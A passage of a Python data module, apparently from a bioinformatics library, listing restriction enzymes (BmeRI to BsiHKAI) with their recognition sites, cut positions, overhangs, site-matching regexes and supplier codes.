'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'C',
'size': 1,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BmeDI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GACNNNNNGTC'),
'compsite': '(?=(?P<BmeRI>GAC.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNGTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BmeRI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<BmeT110I>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['BmeT110I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTC'),
'compsite': '(?=(?P<BmgBI>CACGTC))|(?=(?P<BmgBI_as>GACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BmgBI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GKGCCC'),
'compsite': '(?=(?P<BmgI>G[GT]GCCC))|(?=(?P<BmgI_as>GGGC[AC]C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKGCCC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BmgI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<BmgT120I>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['BmgT120I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGNNCC'),
'compsite': '(?=(?P<BmiI>GG..CC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNNCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BmiI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCNGG'),
'compsite': '(?=(?P<BmrFI>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BmrFI'] = _temp()
def _temp():
return {
'charac': (11, 4, None, None, 'ACTGGG'),
'compsite': '(?=(?P<BmrI>ACTGGG))|(?=(?P<BmrI_as>CCCAGT))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BmrI'] = _temp()
def _temp():
return {
'charac': (10, 9, None, None, 'GCATC'),
'compsite': '(?=(?P<BmsI>GCATC))|(?=(?P<BmsI_as>GATGC))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BmsI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCTAGC'),
'compsite': '(?=(?P<BmtI>GCTAGC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['BmtI'] = _temp()
def _temp():
return {
'charac': (11, 4, None, None, 'ACTGGG'),
'compsite': '(?=(?P<BmuI>ACTGGG))|(?=(?P<BmuI_as>CCCAGT))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BmuI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GACNNNNGTC'),
'compsite': '(?=(?P<BoxI>GAC....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNGTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BoxI'] = _temp()
def _temp():
return {
'charac': (8, 6, None, None, 'GAAGAC'),
'compsite': '(?=(?P<BpiI>GAAGAC))|(?=(?P<BpiI_as>GTCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': 6,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BpiI'] = _temp()
def _temp():
return {
'charac': (-8, -24, 24, 8, 'GAGNNNNNCTC'),
'compsite': '(?=(?P<BplI>GAG.....CTC))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 8,
'scd5': 24,
'site': 'GAGNNNNNCTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BplI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGGAG'),
'compsite': '(?=(?P<BpmI>CTGGAG))|(?=(?P<BpmI_as>CTCCAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['BpmI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGC'),
'compsite': '(?=(?P<Bpu10I>CCT.AGC))|(?=(?P<Bpu10I_as>GCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'I', 'N', 'V'),
}
rest_dict['Bpu10I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCTNAGC'),
'compsite': '(?=(?P<Bpu1102I>GCT.AGC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Bpu1102I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<Bpu14I>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bpu14I'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTTGAG'),
'compsite': '(?=(?P<BpuEI>CTTGAG))|(?=(?P<BpuEI_as>CTCAAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BpuEI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCSGG'),
'compsite': '(?=(?P<BpuMI>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BpuMI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<Bsa29I>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Bsa29I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'YACGTR'),
'compsite': '(?=(?P<BsaAI>[CT]ACGT[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YACGTR',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaAI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GATNNNNATC'),
'compsite': '(?=(?P<BsaBI>GAT....ATC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATNNNNATC',
'size': 10,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<BsaHI>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaHI'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'GGTCTC'),
'compsite': '(?=(?P<BsaI>GGTCTC))|(?=(?P<BsaI_as>GAGACC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCNNGG'),
'compsite': '(?=(?P<BsaJI>CC..GG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CNNG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaJI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'WCCGGW'),
'compsite': '(?=(?P<BsaWI>[AT]CCGG[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WCCGGW',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaWI'] = _temp()
def _temp():
return {
'charac': (-9, -23, 21, 7, 'ACNNNNNCTCC'),
'compsite': '(?=(?P<BsaXI>AC.....CTCC))|(?=(?P<BsaXI_as>GGAG.....GT))',
'dna': None,
'freq': 4096.0,
'fst3': -23,
'fst5': -9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': 7,
'scd5': 21,
'site': 'ACNNNNNCTCC',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaXI'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'CAACAC'),
'compsite': '(?=(?P<BsbI>CAACAC))|(?=(?P<BsbI_as>GTGTTG))',
'dna': None,
'freq': 4096.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAACAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BsbI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<Bsc4I>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Bsc4I'] = _temp()
def _temp():
return {
'charac': (9, 6, None, None, 'GCATC'),
'compsite': '(?=(?P<BscAI>GCATC))|(?=(?P<BscAI_as>GATGC))',
'dna': None,
'freq': 1024.0,
'fst3': 6,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BscAI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCCGT'),
'compsite': '(?=(?P<BscGI>CCCGT))|(?=(?P<BscGI_as>ACGGG))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGT',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BscGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RCCGGY'),
'compsite': '(?=(?P<Bse118I>[AG]CCGG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCCGGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse118I'] = _temp()
def _temp():
return {
'charac': (6, -1, None, None, 'ACTGG'),
'compsite': '(?=(?P<Bse1I>ACTGG))|(?=(?P<Bse1I_as>CCAGT))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse1I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGG'),
'compsite': '(?=(?P<Bse21I>CCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGG',
'size': 7,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse21I'] = _temp()
def _temp():
return {
'charac': (8, 0, None, None, 'GCAATG'),
'compsite': '(?=(?P<Bse3DI>GCAATG))|(?=(?P<Bse3DI_as>CATTGC))',
'dna': None,
'freq': 4096.0,
'fst3': 0,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse3DI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GATNNNNATC'),
'compsite': '(?=(?P<Bse8I>GAT....ATC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATNNNNATC',
'size': 10,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse8I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<BseAI>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BseAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCWGG'),
'compsite': '(?=(?P<BseBI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'W',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BseBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<BseCI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BseCI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCNNGG'),
'compsite': '(?=(?P<BseDI>CC..GG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CNNG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseDI'] = _temp()
def _temp():
return {
'charac': (7, 0, None, None, 'GGATG'),
'compsite': '(?=(?P<BseGI>GGATG))|(?=(?P<BseGI_as>CATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 0,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseGI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GATNNNNATC'),
'compsite': '(?=(?P<BseJI>GAT....ATC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATNNNNATC',
'size': 10,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseJI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<BseLI>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseLI'] = _temp()
def _temp():
return {
'charac': (8, 0, None, None, 'GCAATG'),
'compsite': '(?=(?P<BseMI>GCAATG))|(?=(?P<BseMI_as>CATTGC))',
'dna': None,
'freq': 4096.0,
'fst3': 0,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseMI'] = _temp()
def _temp():
return {
'charac': (15, 8, None, None, 'CTCAG'),
'compsite': '(?=(?P<BseMII>CTCAG))|(?=(?P<BseMII_as>CTGAG))',
'dna': None,
'freq': 1024.0,
'fst3': 8,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseMII'] = _temp()
def _temp():
return {
'charac': (6, -1, None, None, 'ACTGG'),
'compsite': '(?=(?P<BseNI>ACTGG))|(?=(?P<BseNI_as>CCAGT))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseNI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGCGC'),
'compsite': '(?=(?P<BsePI>GCGCGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BsePI'] = _temp()
def _temp():
return {
'charac': (16, 8, None, None, 'GAGGAG'),
'compsite': '(?=(?P<BseRI>GAGGAG))|(?=(?P<BseRI_as>CTCCTC))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 16,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BseRI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GKGCMC'),
'compsite': '(?=(?P<BseSI>G[GT]GC[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'KGCM',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKGCMC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseSI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<BseX3I>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BseX3I'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'GCAGC'),
'compsite': '(?=(?P<BseXI>GCAGC))|(?=(?P<BseXI_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseXI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCAGC'),
'compsite': '(?=(?P<BseYI>CCCAGC))|(?=(?P<BseYI_as>GCTGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BseYI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'GTGCAG'),
'compsite': '(?=(?P<BsgI>GTGCAG))|(?=(?P<BsgI_as>CTGCAC))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsgI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<Bsh1236I>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsh1236I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGRYCG'),
'compsite': '(?=(?P<Bsh1285I>CG[AG][CT]CG))',
'dna': None,
'freq': 1024.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'RY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRYCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsh1285I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<BshFI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BshFI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<BshNI>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BshNI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<BshTI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BshTI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<BshVI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BshVI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGRYCG'),
'compsite': '(?=(?P<BsiEI>CG[AG][CT]CG))',
'dna': None,
'freq': 1024.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'RY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRYCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsiEI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GWGCWC'),
'compsite': '(?=(?P<BsiHKAI>G[AT]GC[AT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'WGCW',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GWGCWC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsiHKAI'] = _temp()
def _temp():
return {
